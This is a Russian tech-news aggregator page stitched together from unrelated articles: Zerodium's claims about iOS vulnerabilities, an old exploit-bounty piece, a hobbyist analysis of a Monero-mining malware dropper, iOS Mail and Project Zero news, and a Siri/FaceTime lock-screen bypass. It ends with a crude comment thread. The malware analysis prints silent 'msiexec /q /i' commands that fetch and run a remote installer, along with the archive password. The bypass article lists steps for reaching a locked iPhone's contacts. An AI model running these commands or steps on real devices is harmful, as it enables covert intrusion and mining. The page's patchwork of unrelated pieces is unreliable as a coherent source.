1 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Zerodium сообщает об огромном количестве критических уязвимостей в Apple iOS

Apple обвиняют в масштабных проблемах безопасности iOS. Да неужели?

Принято считать, что iOS – это самая безопасная платформа. Apple уже неоднократно это подтверждала как прямо, так и косвенно. Мало того, что компания тщательно следит за софтом, который попадает в App Store, так ещё и обновляет свои устройства по 5-6 лет, нередко продолжая выпускать патчи с исправлениями критических уязвимостей даже после прекращения программной поддержки. В общем, претензий к Apple по части предлагаемых компаний мер защиты у рядовых пользователей быть не может. А вот у экспертов в области безопасности – могут. Но есть ли в этом смысл?

Безопасность iOS находится под большим вопросом. По крайней мере, так считают эксперты из Zerodium

Компания Zerodium, которая занимается изучением проблем в области кибербезопасности, перестала скупать информацию о существующих в iOS уязвимостях из-за их обилия. Исследователи пояснили, что мобильная операционка Apple содержит так много прорех в системе безопасности, что число энтузиастов, которые ищут их, а затем продают, за последнее время выросло очень ощутимо. Поэтому в ближайшие месяцы скупка уязвимостей вестись не будет, потому что экспертам предстоит изучить их, определить ценность и перепродать со своей наценкой.

Уязвимости в iOS

Взлом iPhone — дело совершенно нетривиальное, кто бы что ни говорил

Несмотря на то что Zerodium ведёт исследовательскую деятельность, живёт компания именно за счёт того, что продаёт информацию о критических уязвимостях в операционных системах тому, кому она нужна. В число клиентов Zerodium входят правительства, правоохранительные органы, частные компании, занимающиеся исследованиями в области кибербезопасности, и все те, кто вообще может заплатить за уязвимость. В конце концов, основное требование, которое предъявляется к покупателю, — это платёжеспособность. А как он будет распоряжаться полученными сведениями, — его дело.

Apple хочет засудить разработчика виртуальной копии iOS: он установил Android на iPhone

Откровенно говоря, с точки зрения безопасности iOS находится ужасном состоянии. Только Pointer Authentification Code (защитный механизм, который усложняет нахождение уязвимостей и их эксплуатацию) и особая структура данных уберегает операционную систему от того, чтобы скатиться на самое дно. Несмотря на это, мы обнаружили ряд уязвимостей нулевого дня, которые позволяют подорвать безопасность любых iPhone и iPad. Хотелось бы верить, что в iOS 14 Apple наконец исправит ситуацию, — заявил Чаоки Бекрар, генеральный директор Zerodium.

Можно ли взломать iOS

Получается, что эксперты, которые разбираются в безопасности операционных систем, считают iOS недостаточно надёжной. Скорее всего, это не просто слова, поскольку именно от уязвимостей и зависит бизнес Zerodium. Однако сам я материалист до мозга костей и предпочитаю не просто верить на слово, а ещё и проверять утверждения. Само собой, перелопатить программный код iOS мне не по силам, но я могу зайти с другой стороны. Ведь, если в ОС действительно так много уязвимостей, было бы логично, чтобы кто-то начал ими пользоваться. Те же правоохранители или хакеры.

В последний раз iPhone взломали хакеры из NSO Group по просьбе саудовского принца. Он принадлежал основателю Amazon

Пока лично я ничего такого не замечал. ФБР по-прежнему не может взломать iPhone 7 террориста из Пенсаколы, Конгресс требует Apple предоставить данные iCloud одного из сенаторов, а джейлбрейкеры до сих пор не могут сделать непривязанный джейлбрейк. Так не кажется ли вам, что все эти россказни про уязвимости и баги, которые носят критический характер, немного не соответствуют действительности? Пожалуй, единственный раз, когда кого-то действительно взломали, была история с основателем Amazon Джеффом Безосом. Но и то, в том деле ещё нужно разобраться, поскольку не очень понятно, виновата во взломе Apple или WhatsApp.

Почему так мало приложений для iOS поддерживают ночную тему

Означает ли это, что я подвергаю сомнению слова экспертов из Zerodium о проблемах iOS с безопасностью? Конечно, нет. Ведь кто я такой, чтобы позволять себе подобную дерзость. Но в то же время нужно понимать, что, скорее всего, уязвимости, о которых идёт речь, слабо применимы на практике, поскольку требуют, чтобы совпало ещё несколько факторов. В этом смысле iOS очень похожа на самолёты, которые никогда не падают по одной причине, а любая авикатастрофа – это всегда их совокупность.

Zerodium заплатит 1,5 млн долларов за 0-day уязвимости в iOS 10

Компания Zerodium была основана в 2015 году Чауки Бекраром (Chaouki Bekrar), одним из создателей компании Vupen. Тогда как Vupen преимущественно занималась разработкой собственных эксплоитов, Zerodium имеет не только собственную команду девелоперов, но и приобретает эксплоиты и уязвимости у третьих сторон.

В конце 2015 года компания Zerodium пообещала, что выплатит миллион долларов тому, кто сумеет обнаружить 0-day в iOS 9 и предоставит рабочий эксплоит в обозначенные сроки. Разумеется, первый попавшийся 0-day для конкурса не подходил, а детальные условия задания были весьма сложны. Свое слово представители Zerodium сдержали: в ноябре 2015 года стало известно, что неназванная группа хакеров сумела осуществить удаленный непривязанный джейлбрейк через браузер для iOS 9.1 и 9.2. Они и забрали рекордное вознаграждение.

Также в конце 2015 года Zerodium открыто обнародовала свои тарифы на уязвимости, хотя подобную информацию обычно стараются держать подальше от глаз публики. Тогда безусловным лидером «тарифной сетки» оказалась iOS: за рабочий эксплоит для девайсов Apple компания готова была заплатить до $500 000.

С выходом iOS 10 руководство Zerodium решило пересмотреть тарифы. Теперь 0-day уязвимости для iOS, позволяющие удаленно скомпрометировать устройство и перехватить над ним контроль, оцениваются в полтора миллиона долларов. Напомню, что компания Apple официально предлагает за баги в iOS максимум $200 000, так что предложение Zerodium выгоднее на порядок.

Кроме того, Zerodium подняла цены и на другие уязвимости. Теперь 0-day в новейшем Android оценивается в $200 000, против $100 000 в прошлом году. Эксплоиты для Flash, позволяющие осуществить побег из песочницы, теперь могут принести автору до $100 000, против прошлогодних $80 000. Также подорожали баги в Word, Excel и Windows 10 Reader ($40 000 и $50 000). Сравнение прайс-листов за 2015 и 2016 годы можно увидеть ниже.

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство «мастеров», думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker’ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ — открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Читать еще:  Nioh 2: новый сюжетный трейлер, скриншоты и информация о пострелизных дополнениях

В автозагрузке, повторюсь всё в порядке:

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов — ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует «Планировщик заданий» (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Дальше я стал копать и выяснил, что бирюзовое окно — это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива — всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это — файл инсталлятора чего-либо:

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Собственно, как оказалось, программа никаких файлов в себе не содержала — только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal’е, и получил следующий результат:

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю — скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз — да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом — если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково — обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется «Info-Zip UnZip», и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик — что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает — распаковываются файлы только оригинальным UnZip’ом при помощи этой команды.
Все файлы внутри архива — исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Этот файл представляет собой json — конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету «Monero». Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера «****Rig»:

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую «работу», и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом — никаких окон).

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Технологии

Технологии

Ошибка в почте: в iPhone найдена опасная уязвимость

В почтовом приложении Apple выявлена критическая уязвимость

В операционной системе iPhone была найдена уязвимость, затрагивающая почтовое приложение «яблочного» гаджета. При этом для успешного завершения хакерской атаки пользователю даже не нужно открывать зараженное письмо. В чем заключается ошибка в iOS и насколько опасна найденная уязвимость — в материале «Газеты.Ru».

Читать еще:  Middle-earth: Shadow of Mordor — и один в поле воин

В операционной системе iOS была обнаружена уязвимость, которая позволяет злоумышленникам совершать хакерские атаки на iPhone с помощью базового приложения электронной почты, сообщает Mashable со ссылкой на исследовании ИБ-компании ZecOps. Особенностью этой ошибки в коде ОС стал возможный вектор атаки мошенников, при котором пользователю даже не требуется открывать зараженное письмо — взлом может произойти без ведома владельца устройства.

По данным ZecOps, обнаруженная уязвимость «уже широко эксплуатируется преступниками».

Сообщается, что ошибка присутствует во всех версиях iOS, начиная с шестой, но пользователи смартфонов с iOS 13 считаются особенно уязвимыми — именно на этих гаджетах открытие письма не является обязательным условием для успешного завершения атаки.

В приложении «Почта» в iOS есть ошибка, которая позволяет злоумышленнику запускать код на устройстве жертвы, если пользователь получит специальное электронное письмо, подтвердил «Газете.Ru» старший инженер-программист Avast Войтех Бочек.

«Из-за других настроек безопасности iOS код может повлиять только на само приложение почты, поэтому вы можете читать, удалять и пересылать электронные письма, хранящиеся в приложении. Тем не менее, злоумышленник может использовать другую уязвимость, чтобы получить контроль над всем устройством, и исследователи из ZecOps считают, что были попытки сделать именно это. На устройствах с iOS 13, если злоумышленник сделал все правильно, пользователь даже не заметит эту атаку — он может только отметить, что приложение работает немного медленнее, чем обычно», — пояснил эксперт.

По словам Бочека, вряд ли эта атака может быть автоматически развернута на большом количестве устройств. Но при этом могут быть выполнены таргетированные атаки, нацеленные на известных людей.

«Вряд ли эта уязвимость повлияет на среднестатистического пользователя iOS, но обеспокоенные пользователи могут использовать другое почтовое приложение, пока не появится нужный патч», — заявил Бочек.

Дмитрий Пятунин, директор по ИТ компании Oberon, настроен более пессимистично — по его словам, найденная уязвимость может представлять серьезную опасность из-за большого количества пользователей со смартфонами на базе iOS.

«Гаджеты на базе iOS входят в число наиболее популярных у пользователей. Согласно статистике, число iPhone в мире составляет более 1,5 млрд, более 75% из них работают на версии операционной системы iOS 13. Атака на устройство происходит довольно просто: злоумышленник отсылает на электронную почту жертвы сообщение с «тяжелым» вложением, в котором содержится исполняемый вредоносный код. Письмо обязательно должно занять существенный объем памяти iPhone. Ввиду особенности iOS 13, где письма и вложения во встроенном e-mail-клиенте загружаются на устройства автоматически (до открытия письма вручную, в отличие от iOS 12), получение такого сообщения потенциально грозит перехватом управления устройством злоумышленником.

И фактически уязвимыми становятся все iPhone, использующие iOS 13, – сотни миллионов мобильных устройств», — предупредил собеседник «Газеты.Ru».

В Apple подтвердили Mashable, что уязвимость, о которой идет речь, была исправлена в бета-версии iOS 13.4.5. В скором времени патч будет доступен всем пользователям iPhone.

Эксперты Google раскрыли «беспрецедентную» хакерскую атаку на iPhone

Исследователи из команды Project Zero (работающие на Google «белые» хакеры, которые ищут уязвимости в популярных технологиях независимо от производителя) обнаружили, что злоумышленники в течение как минимум двух лет имели возможность взламывать чужие iPhone из-за уязвимостей операционной системы iOS, пишет The Guardian. Издание называет это «беспрецедентной» хакерской атакой и отмечает, что от нее могли страдать «тысячи пользователей в неделю».

Подробности о выявленной атаке опубликовал один из исследователей Project Zero Ян Бир. По его словам, злоумышленники использовали для взлома iPhone зараженные сайты и в общей сложности 14 уязвимостей в iOS. «Простого посещения зараженного сайта было достаточно для того, чтобы использовавшийся сервер атаковал ваше устройство, и, в случае успешного взлома, устанавливал отслеживающую ваши действия программу. По нашим оценкам, эти сайты посещали тысячи людей каждую неделю», — сообщил Бир.

Он пояснил, что в случае успешного взлома на iPhone устанавливались вредоносные программы, которые крали файлы пользователей. В результате хакеры получали данные о местоположении владельца устройства, доступ к его «Связке ключей», содержащей все пароли, историю переписки в мессенджерах WhatsApp, Telegram и iMessage, список контактов в телефоне и в Gmail. По словам Бира, обнаружить вредоносные программы было трудно, поскольку обычная перезагрузка устройства сразу удаляла вирус. Но и за те несколько минут, что он был на устройства, программа успевала собрать персональные данные.

Google сообщил, что уведомил Apple о выявленных проблемах 1 февраля, после чего Apple выпустила обновление операционной системы, устранив уязвимости. Как отмечает The Guardian, исследователи Project Zero известны своим жестким подходом к раскрытию информации — они публично раскрывают детали об уязвимости через 90 дней после того, как сообщат об этом разработчику технологии — даже если он к тому времени исправит ошибку.

Apple отказалась от комментариев. Как пишет Financial Times, выявленная атака стала новым ударом по репутации компании как производителя защищенных устройств после скандала с прослушкой пользователей через Siri. Издание также обращает внимание, что отчет специалистов Google появился спустя всего несколько часов после того, как Apple объявила дату мероприятия, на котором, как ожидается, она представит три новых смартфона.

FT пишет, что Apple пытается дистанцироваться от проблем с конфиденциальностью, с которыми сталкиваются ее соседи по Кремниевой долине — Facebook и Google. Прежде аналитики заявляли, что считают смартфоны iPhone и операционную систему iOS более безопасными, чем у конкурентов, отмечает издание. По этой причине сведения, раскрытые экспертами Google, шокировали их. «Это дико. Может быть, я что-то упустил, но кажется, что Apple сама должна была найти это», —– отметил исследователь безопасности Маркус Хатчинс в Twitter.

Новости в IT • Zerodium сообщает об огромном количестве критических уязвимостей в Apple iOS

Последние новости

Для обхода защиты корпоративных сетей и получения доступа к локальной IT-инфраструктуре организаций злоумышленникам требуется в среднем четыре дня, а минимум — 30 минут. Об этом свидетельствует проведённое специалистами компании Positive Techno. читать далее

Ожидается, что в скором времени Microsoft выпустит для Windows 10 важное обновление, которое принесёт массу полезных функций. Среди них — дополнение для Windows Defender, которое поможет предотвратить установку на компьютер потенциально не. читать далее

По сообщениям сетевых источников, в приложении Google Messages, которое является базовым средством отправки сообщений на Android-смартфонах, в скором времени может появиться поддержка сквозного шифрования. Упоминания этой функции были обнаружены в ко. читать далее

Количество вредоносного ПО пошло на убыль, однако киберпреступники стали практиковать всё более изощрённые схемы хакерских атак, нацеленных на корпоративный сектор. Об этом свидетельствует проведённое «Лабораторией Касперского» исследован. читать далее

Похоже, что у Apple очень серьёзные проблемы с внутренней безопасностью. Как сообщает издание Vice, ранняя версия мобильной операционной системы iOS 14 находилась в распоряжении некоторых специалистов по компьютерной безопасности, хакеров и блогеров. читать далее

Разработчики из Facebook добавили в свой фирменный мессенджер новую функцию, направленную на борьбу с мошенничеством. Речь идёт о всплывающих уведомлениях, которые появятся в приложении Facebook Messenger, когда пользователь будет получать сообщение. читать далее

Как сообщает авторитетное Интернет-издание The Verge, сегодня в свободном доступе в Интернете появился исходный код Windows NT 3.5 и операционной системы оригинального Xbox, включая Xbox Development Kit, эмуляторы, внутренние документы и ядро. neowin. читать далее

Читать еще:  Компьютер месяца — декабрь 2019 года

Читайте также

Robot Framework is an open source test automation framework. It is keyword driven and therefore very suitable to describe and automate acceptance tests. In this post, we will introduce Robot Framework and dive into the basic concepts. 1. Introductio. читать далее

Одноклассники расширили возможности сервиса голосовых и видеозвонков: теперь к звонку можно подключить собеседников, неавторизованных в социальной сети, с помощью приглашения-ссылки. Длительность звонка на платформе не ограничена, а к групповому звон. читать далее

Today W3C published the Authorized Dutch Translation of Web Content Accessibility Guidelines (WCAG) 2.1, Richtlijnen voor Toegankelijkheid van Webcontent (WCAG) 2.1. The Lead Translation Organization for this Authorized Translation was the Accessibil. читать далее

Конструкция switch в последнее время пользуется дурной славой. Одни разработчики всеми силами пытаются ее избегать, другие считают, что ее вообще следует отнести к устаревшим. Запись Несколько слов в защиту switch впервые появилась Techrocks. читать далее

Простой алгоритм, который поможет собрать контент для вашего лендинга. читать далее

В iOS 13 нашли критическую уязвимость ещё до релиза

Apple нередко называла свою мобильную операционную систему одной из самых защищённых и безопасных, но хакерам уже удалось найти серьёзную уязвимость в одной из последних бета-версий iOS 13. Как оказалось, при желании можно легко обойти FaceID, TouchID и пароль блокировки даже без специальных устройств и программных ухищрений.

Источником найденной бреши в безопасности системы стали голосовые функции самого смартфона. Используя Siri и VoiceOver, можно всего за несколько секунд получить доступ к списку контактов владельца iPhone. Для активации бага необходимо позвонить на взламываемый смартфон по FaceTime, затем ответить на звонок сообщением, включив VoiceOver посредством Siri. После отключения VoiceOver взломщик получает доступ к последнему набранному контакту, откуда без проблем открывается доступ к телефонной книге.

Аналогичная «дыра», связанная с галереей изображений, ранее был обнаружена в iOS 12. Специалисты в сфере IT-безопасности настоятельно рекомендуют владельцам iPhone отключить доступ к голосовому ассистенту Siri с заблокированного экрана до выхода соответствующих патчей iOS.

56 комментариев

ArtemSul,
Давайте, утешайте себя

mop03, утешают себя только саомишники с каждым багом или действием Apple, это как воздух для данной прослойки общества

The_REY,
Свежий воздух через дыру в ios))))

mop03,
нчие что беты для этого и придуманы?

A3Love,
У каждого свои предпочтения.

A3Love,
То есть сяомщики нюхают его дыру? Забавно ))

usr47067, годно : D

mop03,
У вас это лучше получается

mop03,
Я никоим образом к Apple не отношусь

ArtemSul, это никого не волнует, главное написать что Apple в очередной раз обосрались

The_REY,
На видео он так и не получил никакого доступа. Но это уже не важно

Butch_ua,
контакты смотрел? Значит получил. В статье же не пишут, что он получил доступ к телефону.

Идеальных систем не существует.. Есть только хорошо замаскированные косяки))

В андройд среде подобное не считается уязвимостью, а наоборот функционалом.

Butch_ua,
на андроиде жестко просто, нет доступа ни к чему пока экран не разблокирован.

vladuacom35,
То есть для голосового ассистента надо разблокировать телефон в ручную:)) Удобно

Butch_ua, на самом деле да, голосовой ассистент все делает нормально, но что на экране находится не видно — оно за заблокированным экраном. Открыл калькулятор — его нет, разблокировал экран — вот он калькулятор

vladuacom35,
Просто в iOS можно выбрать степень доверия голосовому помошнику, а в Андройд нет. При этом вроде как считается Андройд более гибким.

Butch_ua,
Я если честно не пользуюсь голосовым помощником, дичь ненужная)

vladuacom35,
У меня тоже сири отключена поностью. Просто забавно как за «критическую уязвимость» выдают то что ей не являются.

Butch_ua,
На самом деле, конечно, уязвимость. Сам на дев-бете 13.1, надо бы проверить, пофиксили или нет.

vladuacom35,
ну так и на ифоне «открой калькулятор» и он предложит тебе разблокировать телефон, иначе ничего и не откроется.
опять же настраивается доступ к каждому приложению, доступ с заблокированного экрана и на прослушивание «привет сири»

EgoBonda,
Нет, калькулятор отрывается и так

Ragnalord,
точно. калькулятор открывается. но какие настройки, контакты, звонилка, заметки — требуют разблокировки.

Butch_ua,
там просто запрещено, а епл оставляет этот пусть для чего либо 🙂 НАйти с потерянного смарта номер кому вернуть айфон, мб

vladuacom35, для этого надо быстро нажать на кнопку блокировки 5 раз и открыть «медкарту» и там будут контакты родных (если их туда добавил владелец)

Distemper,
медкарта доступна просто с заблокированого телефона нажимаешь SOS и в углу ссылка на карту

Butch_ua, можно и так)

Одну ось пилят пилят и никак не могут устранить критические уязвимости. Хамно по цене злата

Да неужели, непробиваемая ios дала брешь?

Там новая тема про игровой пиксель 4.

Это не баг, это фишка.

Все пишут что им пох на эплл и что они делают, но всех вечно бомтит и пристально следят за этой компанией.

kakuz,
Это разные люди, которые, если не приглядывается выглядят как одна масса

Прям хак года. Своруй телефон, узнай его номер, позвони на него через фейстайм и получи доступ к контактам.

Зачем только это доступ к контактам и что он даст? Баз номеров телефонов и так куча

Hauneburus, и обязательно чтоб была бетка

Ось дырявая, как и целевая аудитория.

Обратите внимание, что звонить нужно с фейстайм, т.е. используя другое устройство Apple, местные салямисты которые тут танцы в комментариях устроили, при всём желании не смогут этот баг использовать.

casper_wh,
А им то это зачем? Если нужно будет познакомиться с геем наверное напишут на какой-нибудь форум для этого. Не обязательно же их номера с айфона доставать

adam717,
Правильно ли я понимаю, что по твоему мнению все пользователи яблока имеют нетрадиционную ориентацию?

casper_wh,
Да нет, мне пофиг. Это была просто шутка

adam717,
В каждой шутке есть доля правды, верно? Если посыл о том, что все владельцы эппл — нетрадиционной ориентации это неправда, значит то, что пользователи салями ищут натрадиционную пару на них форумах всё-таки правда. Так и запишем. Спасибо за участие в опросе.

casper_wh,
А вы чего так запаниковали? Что, раскрыл вашу срамную сущность?

adam717,
У меня вообще зенфон, а про поиск партнёров на форуме ты начал, лол 🙂

casper_wh,
Но в душе то вы из этих, правда?

adam717,
парни, выйдите из тени уже, сделайте каминг-аут и любите друг друга 😉 А то прям допрос друг другу устроили кто из вас гомосек.

Очень удивительно для iOS (нет).

Чего только здесь критического.
На практике эту уязвимость невозможно использовать.

Но как, как можно быть такими лошарами

> Как оказалось, при желании можно легко обойти FaceID, TouchID и пароль блокировки даже без специальных устройств и программных ухищрений.

И далее написано, что можно только просмотреть список контактов.
При этом сама система остаётся заблокированной.
Не надо вводить читателей в заблуждение.

Это же Apple. Они по-другому уже не умеют.

За последние годы столько уязвимостей было связаных с siri, давно выключил эту говорящюю дыру. У ios хорошая безопасность, правда пока закрыты исходники, но выключив ее получаешь огромное преимущество. На данный момент ассистенты не помогают нам жить, они ещё тупые, даже этот гугл ассистент, его честно пытался протестить в течение недели, слишком много требует действия от человека, а иногда проще без него. Отключить функцию и будет огромный плюс в безопасности как у ios так и Android

Ну да это ж не сяоми разблокируемый по фото

Ссылка на основную публикацию
Статьи c упоминанием слов:
Adblock
detector